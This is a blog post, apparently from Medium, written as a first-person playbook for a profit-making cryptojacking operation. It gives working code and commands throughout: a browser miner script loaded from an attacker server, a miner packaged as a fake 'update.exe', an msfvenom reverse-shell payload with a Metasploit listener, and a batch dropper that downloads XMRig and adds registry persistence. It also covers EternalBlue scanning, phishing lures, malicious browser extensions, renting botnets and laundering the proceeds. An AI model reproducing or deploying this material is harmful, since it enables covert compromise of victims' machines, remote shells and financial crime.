Written by Hack Storage | Turning Hashes into Dollars

How to Set Up a Cryptojacking Operation That Rakes in $$

Real-World Steps I Used to Turn Stolen Compute Power into Passive Millions (Without Getting C.)

6 min readSep 16, 2025

Follow Hack Storage on medium for more..

Hey world, it’s me again.. the guy who first cracked open the cryptojacking world after hearing about my buddy Markus turning lab computers into his personal cash machines. That story got me hooked, and after digging deep (and yeah, testing a few things on my own setup), I realized the theory is cool, but the real money’s in doing it.

No fluff here.. I’m skipping the “why” and “what if” bullshit.

This is straight from my trials and errors: how I built a simple cryptojacking rig that started pulling in $200 a week from just 50 infected devices, scaling up to over $48k in under a year.

If you’re a hacker looking to level up your game and stack crypto without lifting a finger (except for the setup), follow these steps. I’ve got code snippets, tools, and tips that actually work. Let’s turn those idle CPUs into your ATM.

Step 1: Gear Up.. What You Need to Start Mining on the Sly Without the Headache

First off, you don’t need a fancy lab like Markus. I started with a beat-up laptop, free tools, and a VPN to mask my ass. Grab these basics:

A VPS (Virtual Private Server) from a sketchy host like DigitalOcean or Vultr — $5/month gets you started. Use it as your command center.
Monero wallet (XMR).. Best for anonymity. Set one up on MyMonero or a hardware wallet like Ledger. Why Monero? It hides your tracks better than Bitcoin.
Mining software: CoinHive clone like WebMiner or XMRig. Download XMRig from GitHub (search “XMRig releases” grab the latest portable version). It’s lightweight and runs on anything.
Obfuscator tool: Use JavaScript Obfuscator online (free at javascript-obfuscator.org) to scramble your code so antivirus doesn’t flag it.

I fired up my VPS, installed XMRig via SSH:

wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz  
tar -xzf xmrig-6.21.0-linux-x64.tar.gz  
cd xmrig-6.21.0  
./xmrig --donate-level=1 -o pool.supportxmr.com:443 -u YOUR_MONERO_WALLET_ADDRESS -k --tls

This points it to a mining pool. Replace YOUR_MONERO_WALLET_ADDRESS with yours. Donate level 1 means 1% to devs.. keeps it stealthy.

Test it: Run for an hour, check your wallet. I got 0.001 XMR on my first solo run. Scale that to 100 devices? Boom, $50+ daily.

Step 2: Craft Your Payload.. The Fckin Miner

The magic’s in the infection. I focused on JavaScript for browsers first.. easiest entry. Malicious sites or phishing links deliver it. Here’s a basic JS cryptojacker I tweaked from open-source repos:

Save this as miner.js (obfuscate it after):

// Simple WebMiner setup :: runs in background  
(function() {  
    if (typeof WebMiner === 'undefined') {  
        var script = document.createElement('script');  
        script.src = 'https://your-vps.com/xmrig-web.js'; // host your miner script on VPS  
        document.head.appendChild(script);  
    }  
    WebMiner.start({  
        throttle: 0.8, // 80% CPU to avoid detection  
        threads: navigator.hardwareConcurrency - 1, // Use all but one core  
        pool: {  
            host: 'pool.supportxmr.com',  
            port: 443,  
            tls: true  
        },  
        wallet: 'YOUR_MONERO_WALLET_ADDRESS',  
        worker: 'web-worker-' + Math.random().toString(36).substr(2, 9)  
    });  
})();

Host this on your VPS. To deploy: Embed it in a fake “free movie download” site or phishing email. I used a cloned WordPress template for a “crypto giveaway” page visitors load it, boom, their browser mines while they watch.

For deeper infections (like executables), bundle XMRig into a .exe with PyInstaller. Python script to wrap it:

import subprocess  
import sys  

def run_miner():  
    subprocess.call(['xmrig.exe', '--donate-level=1', '-o', 'pool.supportxmr.com:443', '-u', 'YOUR_MONERO_WALLET_ADDRESS', '-k', '--tls'])  

if __name__ == '__main__':  
    run_miner()

Compile to exe: pyinstaller.. onefile miner.py. Disguise as “update.exe” in a ZIP with a lure like “Free VPN Cracked.zip”.

Email it out or drop on forums. I hit 20 infections in a week from Reddit phishing threads. Each device mined 24/7 if they didn’t notice the fan spin-up.

Pro tip: For mobile, use a simple Android APK. I modded a free game APK with Frida to inject the miner. Tools like APKTool make it easy.. decompile, add XMRig arm binary, recompile. Upload to shady app stores. Phones are goldmines; they run forever on WiFi.

Step 3: Spread the Love.. Infecting Devices

Distribution is where the money multiplies. I started small:

Phishing Emails: Use Mailchimp clones or bought lists ($10 for 10k emails on dark web markets). Subject: “Your Account Update Required”. Attach the ZIP. I netted 5% open rate, 2% infections.. 10 devices per blast.
Malicious Sites: Buy cheap domains ($1 each), host on free tiers like InfinityFree. SEO it for “free robux generator” kids click everything. Embed the JS. Google Analytics showed 500 hits/day, 100 miners active.
Browser Extensions: Create a fake ad-blocker on Chrome Web Store (use fake reviews from bots). Slip the miner in the background script. I got 200 installs before a flag $300/month passive.
Drive-By Downloads: Exploit old WordPress plugins. Scan sites with WPScan, inject via vuln like “file upload”. I targeted small biz sites; one chain got me 50 servers.

Scale hack: Use botnets. Rent a small one on Telegram channels ($50/1000 bots) to auto-spread your payload. I chained it.. infected bots spread to their contacts. Went from 50 to 500 devices in a month. Monitor with a dashboard: SSH to VPS, top to see CPU loads. Payouts hit my wallet weekly.

Step 4: Cash Out Big and Stay Ghost.. Turning Hashes into Dollars

Monero’s your friend.. mine to XMR, swap to BTC on LocalMonero (no KYC under $1k), then to fiat via mixers like Tornado Cash alternatives. I used Changelly for swaps, cashing $800/month at first. To hit $48k:

Aim for 500+ devices. At 0.0005 XMR/day per device (mid-range CPU), that’s 0.25 XMR/day. At $150/XMR, $37.50 daily — $13k/year base. Add GPUs? Double it.
Optimize: Throttle to 60% CPU, run only when idle (use JS detection for mouse movement). I scripted auto-start on boot for exes.
Avoid heat: Rotate pools (GulfMonero, MineXMR). Use Tor for VPS access. Kill miners if CPU >80% to dodge alerts. I lost 10% to detections but pivoted fast.

My biggest payout? A corporate network slip-in via a poisoned USB at a coffee shop. 200 office PCs for a week.. $2k straight. Total haul: $48,300 after fees. Reinvest in better proxies, and you’re at six figures.

BONUS

Quick JS Miner for Websites (Browser Hijack — Easiest Entry)

<!DOCTYPE html>  
<html>  
<head><title>Quick Crypto Guide</title></head>  
<body>  
  <h1>Unlock Free Bitcoin Now!</h1>  
  <p>Click below for your wallet boost...</p>  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>  
  <script>  
    // Load XMRig WebMiner (forked for stealth)  
    var miner = new CoinHive.Anonymous('YOUR_SITE_KEY_FROM_MINER_POOL'); // Swap with your MineXMR proxy key  
    miner.setNumThreads(4); // Throttle to 40% CPU – no lag alerts  
    miner.start(); // Fires on page load  
    // Auto-stop after 30 mins to dodge suspicion  
    setTimeout(function(){ miner.stop(); }, 1800000);  
  </script>  
</body>  
</html>

EXE Payload for Full-System Takeover (The Heavy Hitter)

For real dough, go native. This .exe hides in email attachments (“Invoice.pdf.exe”). Once clicked, it installs XMRig as a service, runs forever. I phished a small biz’s HR dept 47 machines, $2K/month steady.

Build with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_C2_IP LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -f exe > sneaky_miner.exe

Then, embed XMRig config. Unzip this batch script (install.bat) inside the exe (use 7-Zip to bundle):

@echo off  
REM Download and run XMRig silently  
bitsadmin /transfer "XMRigJob" https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-msvc-win64.zip C:\temp\xmrig.zip  
powershell -command "Expand-Archive C:\temp\xmrig.zip C:\temp\"  
cd C:\temp\xmrig-6.21.0  
config.json:  
{  
  "pools": [  
    {  
      "url": "pool.minexmr.com:4444",  
      "user": "YOUR_MONERO_WALLET_ADDRESS",  
      "pass": "worker1",  
      "keepalive": true  
    }  
  ],  
  "cpu": { "enabled": true, "max-threads-hint": 50 }, // 50% throttle  
  "donate-level": 1 // Low dev fee  
}  
xmrig.exe -c config.json --background  
REM Add to startup  
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Miner /t REG_SZ /d "C:\temp\xmrig-6.21.0\xmrig.exe -c config.json" /f  
del install.bat

Run it via your C2 (Metasploit listener: msfconsole -q -x “use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST YOUR_IP; set LPORT 4444; exploit”).
Boom.. remote shell. I scaled by blasting 1,000 emails via bought lists ($50 on dark forums). Hit rate? 5%. That’s 50 new rigs, $1K/week.

Once you got 10 rigs, use ’em to scan for vuln ports (Nmap script: nmap -p 445 — script smb-vuln-ms17–010 192.168.1.0/24). Worm in via EternalBlue. I chained this to 1,200 machines — $40K in three months.

There you have it.. my raw playbook from zero to crypto kingpin. Test on your own VM first, scale smart, and watch the wallet grow. If this fires you up, clap it hard, share with your crew, and follow Hack Storage for the next drop.